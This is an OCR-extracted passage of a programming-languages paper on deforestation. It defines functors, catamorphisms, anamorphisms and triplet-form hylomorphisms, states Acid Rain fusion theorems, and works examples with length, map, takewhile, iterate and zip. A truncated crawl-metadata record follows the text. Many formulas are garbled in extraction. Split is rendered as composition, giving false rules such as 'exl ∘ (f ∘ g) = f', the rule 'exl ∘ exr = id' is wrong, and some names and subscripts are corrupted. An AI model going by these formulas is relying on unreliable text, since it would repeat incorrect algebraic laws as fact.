orders with continuous functions. This choice facilitates us to handle arbitrary recursive equations in the framework close to lazy functional programming languages. 2.1 Functors Endofunctors on C (functors from C to C) capture the signature of (algebraic) data types. In this paper we assume that all data types are defined by functors whose operation on functions are continuous. In CPO all functors defined using basic functors below and type functors (map functors) satisfy this condition. The definition of type functors is given in section 2.3. Basic functors we assume are id (identity), A (constants), \times (product), A_\perp (strictify) and + (separated sum). We give the definitions of product and separated sum functors and related combinators. Definition 2.1 The product \( A \times B \) of two types \( A \) and \( B \) and its operation to functions are defined as: \[ A \times B = \{(a, b) \mid a \in A, b \in B\} \] \[ (f \times g)(a, b) = (f a, g b) \] The following combinators (left/right projections and split \( \nabla \)) are related to the product functor: \[ exl(a, b) = a \] \[ expr(a, b) = b \] \[ (f \nabla g) a = (f a, g a) \] \[ f \times g = (f \circ \text{exl}) \nabla (g \circ \text{expr}) \] Characterizes their relation. The standard notation for \( f \nabla g \) in category theory is \(<f, g>\). Definition 2.2 The separated sum \( A + B \) of two types \( A \) and \( B \) and its operation to functions are defined as: \[ A + B = (\{0\} \times A \cup \{1\} \times B)_\perp \] \[ (f + g)_\perp = \perp \] \[ (f + g)(0, a) = (0, f a) \] \[ (f + g)(1, b) = (1, g b) \] The following combinators (left/right injections and junc \( \triangledown \)) are related to the separated sum functor: \[ \text{inl} a = (0, a) \] \[ \text{inr} b = (1, b) \] \[ (f \triangledown g)_\perp = \perp \] \[ (f \triangledown g)(0, a) = f a \] \[ (f \triangledown g)(1, b) = g b \] \[ f + g = (\text{inl} \ast f) \vee (\text{inr} \ast g) \] characterizes their relation. The standard notation for \( f \vee g \) in category theory is \([f, g] \). ### 2.2 Data Types as Initial Fixed Points of Functors Let \( F \) be an endofunctor on \( C \). An \( F \)-algebra is a strict function of type \( FA \rightarrow A \). The set \( A \) is called the carrier of the algebra. Dually, an \( F \)-co-algebra is a (not necessarily strict) function of type \( A \rightarrow FA \). An \( F \)-homomorphism \( h \colon A \rightarrow B \) from \( F \)-algebra \( \varphi \colon FA \rightarrow A \) to \( \psi \colon FB \rightarrow B \) is a function which satisfies \( h \circ \varphi = \psi \circ h \). We use a concise notation \( h : \varphi \rightarrow \psi \) to represent this property. Category \( \mathcal{ALG}(F) \) is the category whose objects are \( F \)-algebras and whose morphisms are \( F \)-homomorphisms. Dually, \( \mathcal{COCOALG}(F) \) is the category of \( F \)-co-algebras with \( F \)-co-homomorphisms. The nice thing to work in \( \mathcal{CPO} \) is that \( \mathcal{ALG}(F) \) has an initial object and \( \mathcal{COCOALG}(F) \) has a final object, and their carriers coincide. By Scott's inverse limit construction to construct fixed points of functors, we get an \( F \)-algebra \( \text{in}_F : \mathcal{F} \mu F \rightarrow \mu F \) which is initial in \( \mathcal{ALG}(F) \), and an \( F \)-co-algebra \( \text{out}_F : \mu F \rightarrow \mathcal{F} \mu F \) which is final in \( \mathcal{COCOALG}(F) \). They are each other's inverses, and establish an isomorphism \( \mu F \cong \mathcal{F} \mu F \) in \( C \). They also satisfy the equation \( \mu(\lambda f. \text{in}_F \circ F \circ \text{out}_F) = \text{id}_{\mu F} \). Here \( \mu \) is the fix point operator that satisfies: \( \mu h = h(\mu h) \). We say the type \( \mu F \) is the (algebraic) data type defined by the functor \( F \). Type declarations define data types and initial algebras. For example, \[ \text{nat} ::= \text{Zero} \mid \text{Succ} \text{nat} \] declares \( \text{in}_\text{N} = \text{Zero} \vee \text{Succ} : \text{Nat} \rightarrow \text{Nat} \) is the initial \( N \)-algebra, where \( N \) is the functor \( N = \perp + \text{id} \) (i.e. \( N A = \perp + A \) and \( N h = \text{id}A + h \)) and \( \text{nat} = \mu N \). Here, \( \perp \) is the terminal object in \( C \) and \( \text{Zero} : \perp \rightarrow \text{Nat} \) is a constant. Data types can be parametrized. For example, the type declaration of the list with elements of type \( A \): \[ \text{list} A ::= \text{Nil} \mid \text{Cons} (A, \text{list} A) \] declares \( \text{in}_\text{L}_A = \text{Nil} \vee \text{Cons} : \text{L}_A(\text{list} A) \rightarrow \text{list} A \) is the initial \( \text{L}_A \)-algebra, with the functor \( \text{L}_A = \perp + A \times \text{id} \) (i.e. \( \text{L}_A B = \perp + (A \times B) \) and \( \text{L}_A h = \text{id}A + (id_A \times h) \)). As the final \( \text{L}_A \)-co-algebra, we can take: \[ \text{out}_{\text{L}_A} = (id \perp + hd \Delta t1) \ast \text{in} \text{nil}? : \text{list} A \rightarrow \text{L}_A(\text{list} A) \] Here \( \text{p} \)? injects a value \( x \) of type \( A \) into the union type \( A + A \) according as the result of \( \text{p} \text{ x} \). The definition of \text{out}_{\text{L}_A} \) above corresponds to \[ \lambda x. \text{if is.nil x then } \perp \text{ else } (\text{hd} x, \text{tl} x) \] We sometimes write \( \text{L}(A, B) \) instead of \( \text{L}_A(B) \), where we think \( \text{L} \) is a bifunctor (i.e. \( \text{L}(A, B) = \perp + (A \times B) \) and \( L(f, h) = id \perp + (f \times h) \)). Every parametrized type constructor is associated with a certain functor, called a \emph{type functor} (a map functor). For example, the type functor list coincides the familiar \text{map} function. The type functor can be defined in general using the notion of catamorphism. We will give the definition when it is available in the next section. ### 2.3 Catamorphisms and Anamorphisms Initiality of \( \text{in}_F \) in \( \mathcal{ALG}(F) \) implies: for any \( F \)-algebra \( \varphi : FA \rightarrow A \), there exists a unique \( F \)-homomorphism \( h : \text{in}_F \rightarrow \varphi \). This homomorphism is called \emph{catamorphism} and denoted by \( \langle \varphi \rangle \). Dually, the finality of \( \text{out}_F \) in \( \text{COALG}(F) \) implies: for any \( F \)-co-algebra \( \psi : A \to FA \), there exists a unique \( F \)-co-homomorphism \( h : \psi \to \text{out}_F \) called anamorphism, and is denoted by \( \langle \psi \rangle \). These two morphisms can equivalently be defined as least fixed points: \[ \begin{align*} \langle \cdot \rangle & : (FA \to A) \to \mu F \to A \\ \langle \varphi \rangle & = \mu(\lambda f. \varphi \circ F f \circ \text{out}_F) \\ \langle \psi \rangle & : (A \to FA) \to A \to \mu F \\ \langle \psi \rangle & = \mu(\lambda f. \text{in}_F \circ F f \circ \psi) \end{align*} \] We sometimes omit the suffix \( F \) when it is clear from the context. From these fixed point definitions and the properties of \( \mu \), \( \text{in}_F \) and \( \text{out}_F \), it is easy to see the following equalities hold: \[ \begin{align*} \langle \varphi \rangle & = \varphi \circ F \langle \varphi \rangle \circ \text{out}_F \\ \langle \varphi \rangle \circ \text{in}_F & = \varphi \circ F \langle \varphi \rangle \\ \langle \psi \rangle & = \text{in}_F \circ F \langle \psi \rangle \circ \psi \\ \text{out}_F \circ \langle \psi \rangle & = F \langle \psi \rangle \circ \psi \end{align*} \] Catamorphisms are generalized fold operations that substitute the constructors of a data type with other operations of same signature. Catamorphisms provide a standard way to consume a data structure, and dually, anamorphisms offer a standard way for constructing data structures. Anamorphisms are generalized unfold operations. It has been argued in [GLP93, SF93] that many standard functions over data structures can be represented using catamorphisms. We are now ready to give the definition of type functors in general. Given an initial algebra \( \text{in} : F(A, TA) \to TA \), the type functor \( T \) is defined by \[ Tf = \langle \text{in} \circ F(f, id) \rangle. \] For example for the example of lists, \[ \begin{align*} \text{in}_{\text{L}} & : \text{L}(A, \text{list } A) \to \text{list } A \\ \text{list } f & = \langle (\text{Nil } \circ \text{Cons}) \circ \text{L}(f, id) \rangle_{\text{L}} \\ & = \langle (\text{Nil } \circ \text{Cons}) \circ (id_{\perp} + (f \times id)) \rangle_{\text{L}} \\ & = \langle \text{Nil } \circ (\text{Cons } \circ (f \times id)) \rangle_{\text{L}}. \end{align*} \] By expanding the definition of the catamorphism, we get the definition of map function on lists. ### 2.4 Hylomorphisms A hylomorphism \( \llbracket \varphi, \psi \rrbracket \) is what you get by composing a fold with an unfold: \( \langle \varphi \rangle \circ \langle \psi \rangle \). Equivalently [MFP91], a hylomorphism is the fixed shape of recursion that comes with a particular functor. \[ \begin{align*} \llbracket \cdot, \cdot \rrbracket & : (FA \to A) \times (B \to FB) \to B \to A \\ \llbracket \varphi, \psi \rrbracket & = \mu(\lambda f. \varphi \circ F f \circ \psi) \end{align*} \] It is obvious from definitions that catamorphisms and anamorphisms are special cases of hylomorphisms: \[ \begin{align*} \llbracket \cdot \rrbracket & = \llbracket \cdot, \text{out}_F \rrbracket, \quad \llbracket \psi \rrbracket = \llbracket \text{in}_F, \cdot \rrbracket \end{align*} \] Hylomorphism \( \llbracket \varphi, \psi \rrbracket \) is a recursive function whose call graph is isomorphic to the data type \( \mu F \). It is known most practical functions can be represented as hylomorphisms ([BM94]). Meertens proved in [Mee92] that every primitive recursive function on an algebraic type can be represented as a hylomorphism on some algebraic type. Hylomorphisms enjoy many useful laws for program calculation. The law called HyloShift, \[ \eta : F \to G \Rightarrow [\varphi \cdot \eta, \psi] = [\varphi, \eta \cdot \psi], \] shows that natural transformations can be shifted between the two parameters of hylomorphisms. Based on this property we will introduce a new notation for hylomorphisms in section 3.3. 3 Rules for Deforestation 3.1 Shortcut Deforestation The core of the shortcut deforestation algorithm proposed in [GLPJ93] is the single rule of cancellation for a pair of foldr and build: \[ g : \forall \beta . (A \to \beta \to \beta) \to \beta \to \beta \Rightarrow \text{foldr} \ k \ z \ (\text{build} \ g) = g \ k \ z \] where the function build is defined as \[ \text{build} \ g = g \ \text{Cons} \ \text{Nil}. \] By using foldr and build to standardize the structure of consuming/producing functions of lists, their transformation is the repetitive applications of this rule. By expanding the definition of build, we get \[ g : \forall \beta . (A \to \beta \to \beta) \to \beta \to \beta \Rightarrow \text{foldr} \ k \ z \ (g \ \text{Cons} \ \text{Nil}) = g \ k \ z \] This rule can be restated in terms of catamorphisms: \[ g : \forall B . (L_A B \to B) \to B \Rightarrow (|\varphi|_{L}) (g \ \text{in}_{L}) = g \ \varphi \] This law nicely captures the intuition behind a catamorphism, namely replace the constructors \( \text{in}_{L_A} \), the initial \( L_A \)-algebra, by function \( \varphi \), an arbitrary \( L_A \)-algebra. Now we have enough clues to generalize this rule for other algebraic types. 3.2 Acid Rain Theorem The analysis in the previous section suggests that the following theorem holds in general([Mei94]). Theorem 3.1 (Acid Rain) \[ g : \forall A . (FA \to A) \to A \Rightarrow (|\varphi|_{F}) (g \ \text{in}_{F}) = g \ \varphi \] Proof The free theorem ([Wad89]) associated with the type of \( g \) is \[ f \cdot \psi = \varphi \cdot F f \Rightarrow f (g \ \psi) = g \ \varphi \] In case \( g \) is defined using recursion, \( f \) needs to be strict as well. By taking \( f := (|\varphi|_{F}), \ \psi := \text{in}_{F} \), this rule is instantiated to \[ (|\varphi|_{F}) \cdot \text{in}_{F} = \varphi \cdot F (|\varphi|_{F}) \Rightarrow (|\varphi|_{F}) (g \ \text{in}_{F}) = g \ \varphi \] This premise trivially holds because \( (|\varphi|_{F}) \) satisfies its defining fixed point equation (and is strict as well). \( \square \) For the applications we have in mind it is more convenient to rephrase the Acid Rain theorem on the function level: Theorem 3.2 (Acid Rain : Catamorphism) \[ g : \forall A. (F A \rightarrow A) \rightarrow B \rightarrow A \] \[ \Rightarrow \ (\varphi)_\varphi \circ (g \ \text{in}_\varphi) = g \ \varphi \] Here \( B \) is some fixed type that does not depend on \( A \). One of the benefits of working on the function level is that we can take the dual of this rule. Theorem 3.3 (Acid Rain : Anamorphism) \[ h : \forall A. (A \rightarrow F A) \rightarrow A \rightarrow B \] \[ \Rightarrow \ (h \ \text{out}_\psi) \circ [\psi]_h = h \ \psi \] It is not difficult to prove these theorems as a free theorem in the same way as the first one. We omit the proof here. The two acid rain theorems show how we can generalize shortcut deforestation to any algebraic data types, and moreover provide yet another deforesting transformation for values produced by unfolding. Although these two rules are general enough to capture every case where we can deforest intermediate data structures of arbitrary type, it is not easy to design an automatic deforestation algorithm based on them. It is not obvious how to find the places (redexes) in the program where these rules are applicable, and in which order we should apply these rules when the redexes are overlapping. As they are stated in the function level and cover the dual cases (anamorphisms), there are more chance to have overlapping redexes. To tackle this problem we need some syntactic clue in the program for searching the candidates for \( g \) or \( h \) of these rules. The ideal representation of program must facilitate us finding these candidate polymorphic functions together with catamorphisms and anamorphisms. Natural choice would be hylomorphisms, which include catamorphisms and anamorphisms as special cases. And most practical functions can be represented as hylomorphisms ([BM94]). ### 3.3 Hylomorphisms as Triplets We adopt hylomorphisms as the basic components to represent the structure of programs. As the preparation for designing our deforestation algorithm, we restate the above two Acid Rain rules as a single theorem about hylomorphisms. Many functions are catamorphic on their input type and anamorphic on their output type at the same time. For example, the function \( \text{length} \) that returns the length of a given list is a catamorphism on list \( A \) and an anamorphism on \( \text{nat} \): \[ \text{length} = (\{ \text{Zero} \circ (\text{Succ} \circ \text{expr}) \})_A \\ = \{ (\text{id} + \text{tl}) \circ \text{isnil}\}^N \\ \] For any natural transformation \( \eta : F \rightarrow G \), HyloShift implies \[ (\text{lin}_\varphi \circ \eta)_\varphi = [\text{lin}_\varphi \circ \eta \circ \text{out}_\psi]_F \\ = [\text{lin}_\varphi \circ \eta \circ \text{out}_\psi]_G = [\eta \circ \text{out}_\psi]_G \\ \] If we do not want to miss the chance that this kind of hylomorphism consists the redex for the Acid Rain rules, the possibilities of HyloShift rule application have to be considered always. To avoid this cumbersomeness by preparing a neutral representation for them, we introduce a new notation of hylomorphisms, where the natural transformation is explicitly factored out as an extra second parameter. Definition 3.1 (Hylomorphism in triplet form) Hylomorphism $\varphi, \eta, \psi \in_{G,F}$ is defined as follows: $$\varphi, \eta, \psi \in_{G,F} = \mu(\lambda f. \varphi \circ \eta \circ f \circ \psi)$$ $$(G \rightarrow A) \times (F \rightarrow G) \times (B \rightarrow FB) \rightarrow (B \rightarrow A)$$ We sometimes omit the suffix $G,F$ when it is clear from the context. With this notation the hylomorphisms which are essentially built up from some natural transformation can be represented as it is. Now the example explained above has the proper neutral representation as a hylomorphism: $$(|\in_{G} \circ \eta|)_{F} = \in_{G} \circ \eta \circ \text{out}_{F} \in_{G,F} = (\eta \circ \text{out}_{F})_{G}$$ The function $\text{length}$ is represented as follows: $$\text{length} = [\in_{\varphi}, \text{id+expr}, \text{out}_{A}]_{N,L_{A}}$$ The type functor $T$ defined in section 2.3 can always be representable as a hylomorphism of this kind: $$Tf = [\in_{f}, F(f, \text{id}), \text{out}]$$ With this notation, it becomes much easier to judge whether a hylomorphism is either a catamorphism or a anamorphism. If the third parameter of the hylomorphism is $\text{out}_{F}$, it is a $F$-catamorphism, and if its first parameter is $\in_{G}$, it is a $G$-anamorphism. The HyloShift rule becomes $$\varphi, \eta, \psi \in_{G,F} = [\varphi \circ \eta, \text{id}, \psi]_{F',L} = [\varphi, \text{id}, \eta \circ \psi]_{G,G}$$ 3.4 Rules for Hylomorphism Fusion The Acid Rain Theorems for catamorphism and anamorphism can be restated in terms of the new notation for hylomorphisms. Theorem 3.4 (Cata-HyloFusion) $$\tau : \forall A.(F A \rightarrow A) \rightarrow F' A \rightarrow A \Rightarrow$$ $$[\varphi, \eta, \text{out}_{F}]_{G,F} \circ [\tau \circ \text{in}_{F}, \eta_{2}, \psi]_{F',L} = [\tau (\varphi \circ \eta_{1}), \eta_{2}, \psi]_{F',L}$$ Proof The first component of the left-hand side is just a catamorphism $([\varphi \circ \eta_{1}]_{G})$. The second component hylomorphism has a type $B \rightarrow A$ where $A$ and $B$ are the carriers of $\tau \circ \text{in}_{F}$ and $\psi$, correspondingly. Consider the following lambda term: $$g = \lambda f. [\tau f, \eta_{2}, \psi]_{F,L}$$ As $\tau$ is polymorphic, $g$ becomes also polymorphic and has a type: $$g : \forall A.(F A \rightarrow A) \rightarrow B \rightarrow A$$ This type exactly match the type requirement for $g$ in Theorem 3.2, and the simple instantiation proves this theorem. □ Taking the dual of this theorem, we get the following theorem. Theorem 3.5 (Hylo-AnaFusion) \[ \sigma : \forall A.(A \rightarrow F A) \rightarrow A \rightarrow F' A \Rightarrow \] \[ [\varphi, \eta_1, \sigma \text{out}_F]_{g,F} \ast [\text{in}_F, \eta_2, \psi]_{f,L} = [\varphi, \eta_1, \sigma (\eta_2 \ast \psi)]_{g,F}. \] These two rules provides the theoretical basis of our deforestation algorithm. Note that HyloSplit\(^{-1}\) rule is just a special case of these rules, by taking \(\tau := \text{id}\) or \(\sigma := \text{id}\): \[ [\varphi, \eta_1, \text{out}_F]_{g,F} \ast [\text{in}_F, \eta_2, \psi]_{f,L} = [\varphi, \eta_1 \ast \eta_2, \psi]_{g,F}. \] 4 Transformation based on Hylomorphism Fusion Our transformation algorithm is completely based on the two HyloFusion rules above, and repetitively applies these rules until there is no redex left in the program. Both rules replace the composition of two hylomorphisms with one hylomorphism, so termination is vacuous. The application of the rule is always safe in the sense that every application removes some intermediate data structure which has been passed through the eliminated composition. The essence of our transformation algorithm is the reduction strategy which controls the order of redexes to be picked up. How to decide the reduction order of overlapping redexes is the main part of the algorithm. 4.1 The Language In principle, our transformation method is applicable to any functional program as long as it includes some compositions of hylomorphisms. But to get the most out of our method, we assume here the programs are entirely written as compositions of hylomorphisms. Of course programs may include some lambda expressions inside and outside of hylomorphisms, but it is not allowed to write explicit recursion. Every recursion has to be standardized using hylomorphisms. Basic functors and the related combinators can be freely used to combine hylomorphisms or to define the parameters for hylomorphisms. 4.2 Two Examples of Transformation Let us consider the following three standard functions on the list data structure. They are defined as hylomorphisms: \[ \text{length} = [\text{in}_N, \text{id} + \text{expr}, \text{out}_B] \] \[ \text{map } f = [\text{in}_B, \lambda(f, \text{id}), \text{out}_A] \] \[ (\mathbf{+} \mathbf{s}) = [\tau \text{in}_A, \text{id}, \text{out}_A], \] where \(\tau = \lambda n \cdot c.(\lambda n \cdot c, \text{id}, \text{out}_A)\mathbf{ys} \mapsto c.\) Here we assume that \(\lambda n \cdot c...\) is a pattern that matches any \(f \mapsto h\). To define \((\mathbf{+} \mathbf{ys})\) in the proper abstract level, the constructors (\text{Nil} and \text{Cons}) in \mathbf{ys} are replaced by \(n\) and \(c\) systematically, using another hylomorphism in the definition of \(\tau\). This exactly corresponds to the definition of \(\mathbf{+}\) in [GLPJ93]. Then the composition \(\text{length} \circ (\text{map} \ f) \circ (\text{++} \ ys)\) is transformed as follows: \[ \text{length} \circ (\text{map} \ f) \circ (\text{++} \ ys) \\ = \quad \{\text{definition of length, map and ++ }\} \\ [[\text{in}_N, \text{id} + \text{exr}, \text{out}_A] \\ \quad \circ [[\text{in}_N, \text{L}(f, \text{id}), \text{out}_A] \circ [[\text{in}_N, \text{id}, \text{out}_A] \\ = \quad \{\text{HyloSplit}^{-1}\} \\ [[\text{in}_N, (\text{id} + \text{exr}) \circ \text{L}(f, \text{id}), \text{out}_A] \circ [[\text{in}_N, \text{id}, \text{out}_A] \\ = \quad \{\text{definition of in}_N \text{ and L}\} \\ [[\tau(\text{Zero} \circ \text{Succ}) \circ (\text{id} + \text{exr}) \circ (\text{L} \circ \text{id}), \text{id}, \text{out}_A] \\ = \quad \{\text{properties of basic functors }\} \\ [[\tau(\text{Zero} \circ (\text{Succ} \circ \text{exr})), \text{id}, \text{out}_A] \\ = \quad \{\text{definition of } \tau\} \\ [[[[\text{Zero} \circ (\text{Succ} \circ \text{exr}), \text{id}, \text{out}_A] \circ (\text{Succ} \circ \text{exr}), \\ \text{id}, \text{out}_A]] \] By inlining the definition of hylomorphism, we get the familiar recursive definition: \[ \text{length} \circ (\text{map} \ f) \circ (\text{++} \ ys) = h \\ \text{where} \ h \ Nil = g \ ys \\ \quad \text{where} \ g \ Nil = 0 \\ \quad g \ Cons(x, xs) = 1 + (g \ xs) \\ \quad h \ Cons(x, xs) = 1 + (h \ xs) \] Note that the intermediate list structure produced by \(\text{map} \ f\) and \((\text{++} \ ys)\) is no longer generated. Our second example includes the functions \text{iterate} and \text{takewhile} which are both anamorphisms on the list. They are usually defined by the following recursive equations: \[ \text{iterate} \ f \ x = Cons(x, \text{iterate} \ f \ (f \ x)) \\ \text{takewhile} \ p \ Nil = Nil \\ \text{takewhile} \ p \ Cons(x, xs) = \text{if} \ p \ x \ \text{then} \ Cons(x, \text{takewhile} \ p \ xs) \\ \quad \text{else} \ Nil \] They can be defined as hylomorphisms: \[ \text{iterate} \ f = [[\text{in}_A, \text{id}, \text{inr} \circ (\text{id} \circ f)] \\ \text{takewhile} \ p = [[\text{in}_A, \text{id}, \sigma \circ \text{out}_A] \\ \quad \text{where} \ \sigma = \lambda h. (\text{id}_L \circ g) \circ h \\ \quad \text{where} \ g \ (x, xs) = \text{if} \ p \ x \ \text{then} \ \text{inr}(x, xs) \ \text{else} \ \text{inl}() \] Since \text{takewhile} cannot be represented as a catamorphism, previous methods in [GLPJ93, SF93] cannot remove the intermediate list which is consumed by \text{takewhile}. Our method naturally covers these dual cases. Then the composition \((\text{takewhile } p) \circ (\text{iterate } f)\) is transformed as follows: \[ (\text{takewhile } p) \circ (\text{iterate } f) = \{\text{definition of takewhile and iterate}\} \] \[ [\text{in}_{A}, \text{id}, \sigma \text{out}_{A}] \circ [\text{in}_{A}, \text{id}, \text{inr} \circ (id \circ f)] \] \[ = \{\text{Hylo-AnaFusion}\} \] \[ [\text{in}_{A}, \text{id}, \sigma \text{in}_{(id \circ f)}] \] \[ = \{\text{definition of } \sigma\} \] \[ [\text{in}_{A}, \text{id}, (id \circ g) \circ (\text{inr} \circ (id \circ f))] \] \[ = \{\text{properties of combinators}\} \] \[ [\text{in}_{A}, \text{id}, g \circ (id \circ f)] \] By inlining the definition of hylomorphism, we get the following recursive definition: \[ (\text{takewhile } p) \circ (\text{iterate } f) = h \] where \( h : x = \text{if } p \ x \ \text{then } \text{Cons}(x, h(f \ x)) \ \text{else } \text{Nil} \) Note that the intermediate list generated by \(\text{iterate}\) has been eliminated. It is clear from this example that our method is more powerful than the previous methods even when restricted to the list data structure. 4.3 Transformation Algorithm The reduction strategy to control the order of application of the rules (Cata-HyloFusion and Hylo-AnaFusion) defines our transformation algorithm. Note that Cata-HyloFusion does not change the compositional interface to the right: the third parameter of the right hylomorphism remains unchanged as the third parameter of the resultant hylomorphism. Dually, Hylo-AnaFusion does not change the compositional interface to the left. We call the redexes of each rules \textit{Cata-Hylo redex} and \textit{Hylo-Ana redex} correspondingly. Because there are two kinds of redexes, four different cases of overlapping redexes exist: 1. Two Cata-Hylo redexes overlap: \[ [\varphi, \eta_1, \text{out}_F] \circ [\tau_1 \text{in}_F, \eta_2, \text{out}_G] \circ [\tau_2 \text{in}_G, \eta_3, \psi] \] In this case the reduction of the left redex does not destroy the right one. 2. Two Hylo-Ana redexes overlap: \[ [\varphi, \eta_1, \sigma_1 \text{out}_F] \circ [\tau \text{in}_F, \eta_2, \sigma_2 \text{out}_G] \circ [\tau \text{in}_G, \eta_3, \psi] \] In this case the reduction of the right redex does not destroy the left one. 3. A Cata-Hylo redex (in the left) overlaps with a Hylo-Ana redex (in the right): \[ [\varphi, \eta_1, \text{out}_F] \circ [\tau \text{in}_F, \eta_2, \sigma \text{out}_G] \circ [\text{in}_G, \eta_3, \psi] \] In this case the reduction of either redex does not destroy the other redex. 4. A Hylo-Ana redex (in the left) overlaps with a Cata-Hylo redex (in the right): \[ [\varphi, \eta_1, \sigma \text{out}_F] \circ [\text{in}_F, \eta_2, \text{out}_G] \circ [\text{in}_G, \eta_3, \psi] \] In this case the reduction of either redex does destroy the other redex. This observation tells us that the series of overlapping redxes of the same kind (case 1 and 2 above) are sensitive to the reduction order. **Definition 4.1 (Redex chain)** A Cata-Hylo (Hylo-Ana) redex chain is the series of Cata-Hylo (Hylo-Ana) redexes with overlaps. The following reduction strategy defines our algorithm: **Definition 4.2 (Reduction order)** 1. Find all maximal Cata-Hylo redex chains, and reduce each chain from left to right. 2. Find all maximal Hylo-Ana redex chains, and reduce each chain from right to left. 3. Simplify the inside of each hylomorphisms using reduction rules for basic functors and related combinators. 4. If there exists any redex for HyloFusion rules, return to step 1 and continue reduction. The reduction rules used in step 3 is listed in the next section. ### 4.4 Reduction Rules for Basic Functors Following rules are used to reduce the functor during the transformation. These equations describe some of the properties of basic functors and related combinators. \[ \begin{align*} exl \circ (f \times g) &= f \circ exl \\ exr \circ (f \times g) &= g \circ exr \\ exl \circ (f \circ g) &= f \\ exr \circ (f \circ g) &= g \\ exl \circ exr &= id \\ (f \times g) \circ (h \triangle j) &= (f \circ h) \circ (g \circ j) \\ (f \times g) \circ (h \times j) &= (f \circ h) \times (g \circ j) \\ (f \circ g) \circ h &= (f \circ h) \circ (g \circ h) \\ (f + g) \circ \text{inl} &= \text{inl} \circ f \\ (f + g) \circ \text{inr} &= \text{inr} \circ g \\ (f \triangledown g) \circ \text{inl} &= f \\ (f \triangledown g) \circ \text{inr} &= g \\ \text{inl} \triangledown \text{inr} &= id \\ (f \triangledown g) \circ (h + j) &= (f \circ h) \triangledown (g \circ j) \\ (f + g) \circ (h + j) &= (f \circ h) + (g \circ j) \\ f \circ (g \triangledown h) &= (f \circ g) \triangledown (f \circ h) \quad (\text{for strict } f) \end{align*} \] 4.5 More Examples of Transformation To demonstrate the power of our transformation, let's consider the following functions: \[ zip = \left[ in_{A \times B}, (id + abide) \circ IsNilOr, out_A \times out_B \right] \] where \( abide = (exl \times exl) \Delta (exr \times exr) \) \[ IsNilOr \ ((1, x), (1, y)) = (1, (x, y)) \] \[ IsNilOr \ ((i, x), (j, y)) = (0, (x, y)) \] \[ iterate f = \left[ in_{A}, id, \text{inr} \circ (id \circ f) \right] \] Then the composition \( zip \circ ((iterate f) \times zip) \) is transformed as follows: \[ zip \circ ((iterate f) \times zip) = h \] where \[ h(x, (Nil, zs)) = Nil \] \[ h(x, (ys, Nil)) = Nil \] \[ h(x, (ys, zs)) = \text{Cons}((x, (hd_ys, hd_zs)), h(fx, (tl_ys, tl_zs))) \] In [GLPJ93] \( zip \) has been discussed to explain the most serious limitation of their method. It is clear from this example that our transformation has successfully lift their limitation: the both input lists to \( zip \) have been deforested. 5 Related Work Deforestation was first proposed by Wadler in [Wad88] as an automatic transformation to remove unnecessary intermediate data structure. The class of programs his algorithm can treat is characterized as treeless program which is a subset of first-order programs. Based on the observation that some intermediate data structures of basic types (e.g. integers, characters, etc.) need not to be removed, Wadler developed the blazing technique to handle such terms. He also discusses to apply his method to some higher-order programs whose higher-order functions can be treated as macros. Our method works on much wider class of higher-order programs, and it need not expand to first-order forms. It is also easy to control what types of intermediate data structures are to be removed with our method. The fusion transformation proposed by Chin ([Chi92]) generalizes deforestation to make it applicable to all first-order programs. Combining it with his higher-order removal technique, his algorithm can take any first-order and higher-order program as its input. Inspired by Wadler's blazing deforestation, Chin devised the double annotation scheme for safe fusion to recognize and skip over terms to which his techniques do not apply. Because his method basically annotates non-treeless subterms, the improvement to Wadler's method comes from the power of higher-order removal. Our method accepts the example of higher-order removal in his paper and successfully transforms it to the same first-order program. Moreover the example program \texttt{sizet} (defined as \texttt{length+flatten} on binary tree), which cannot be handled with Chin's method without assuming an extra law on \texttt{length} and \texttt{append}, naturally be deforested by our method without any extra laws. In [FSZ94] Fegaras, Sheard and Zhou extend their normalization algorithm in [SF93] to the more general fold programs which recurse over multiple inductive structures simultaneously, such as \texttt{zip} or \texttt{nth}. Because our method always works on the function level and explicitly manipulates the functors, it is easy to give symmetric definitions to those functions like \texttt{zip}. Sørensen ([Sør94]), applies a tree grammar-based data-flow analysis to put annotations on programs that guarantee termination of deforestation for the wider class of first-order programs than Chin's method. The grammar is used to approximates the set of terms that the deforestation algorithm encounters, and successfully locates the increasing (accumulating) parameters which could be the source of infinite unfolding. Sørensen, Glück and Jones ([SGJ94]) pick up four different transformation methods (Partial Evaluation, Deforestation, Supercompilation and Generalized Partial Computation [FNT91, Tak91]) and discuss the difference of transformational power of each method. Because each method is defined for the different language in syntactic way, it is not easy to compare without losing the insights of each method. Calculation-based transformations provides the better device for such comparative study. Acknowledgments We are grateful to Lambert Meertens, Kieran Clenaghan and Fer-Jan de Vries for providing encouragement and valuable feedback for this research. Many thanks also to Leonidas Fegaras, Zhenjiang Hu, Hideya Iwasaki, Ross Paterson and Masato Takeichi for their comments on the draft of this paper. References
{"Source-Url": "https://repository.kulib.kyoto-u.ac.jp/dspace/bitstream/2433/59662/1/0918-21.pdf", "len_cl100k_base": 11980, "olmocr-version": "0.1.53", "pdf-total-pages": 16, "total-fallback-pages": 0, "total-input-tokens": 76765, "total-output-tokens": 14301, "length": "2e13", "weborganizer": {"__label__adult": 0.0004284381866455078, "__label__art_design": 0.0004372596740722656, "__label__crime_law": 0.00036215782165527344, "__label__education_jobs": 0.0008349418640136719, "__label__entertainment": 8.744001388549805e-05, "__label__fashion_beauty": 0.0002058744430541992, "__label__finance_business": 0.0002416372299194336, "__label__food_dining": 0.0005087852478027344, "__label__games": 0.0007214546203613281, "__label__hardware": 0.0010156631469726562, "__label__health": 0.0008854866027832031, "__label__history": 0.0003142356872558594, "__label__home_hobbies": 0.00014472007751464844, "__label__industrial": 0.0005030632019042969, "__label__literature": 0.0004656314849853515, "__label__politics": 0.00032782554626464844, "__label__religion": 0.0006909370422363281, "__label__science_tech": 0.038360595703125, "__label__social_life": 0.00010883808135986328, "__label__software": 0.004177093505859375, "__label__software_dev": 0.94775390625, "__label__sports_fitness": 0.00039458274841308594, "__label__transportation": 0.0007014274597167969, "__label__travel": 0.00022327899932861328}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 43921, 0.01351]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 43921, 0.63297]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 43921, 0.82171]], "google_gemma-3-12b-it_contains_pii": [[0, 492, false], [492, 3351, null], [3351, 7254, null], [7254, 10003, null], [10003, 14359, null], [14359, 18020, null], [18020, 20587, null], [20587, 23787, null], [23787, 26329, null], [26329, 29152, null], [29152, 31724, null], [31724, 34298, null], [34298, 36455, 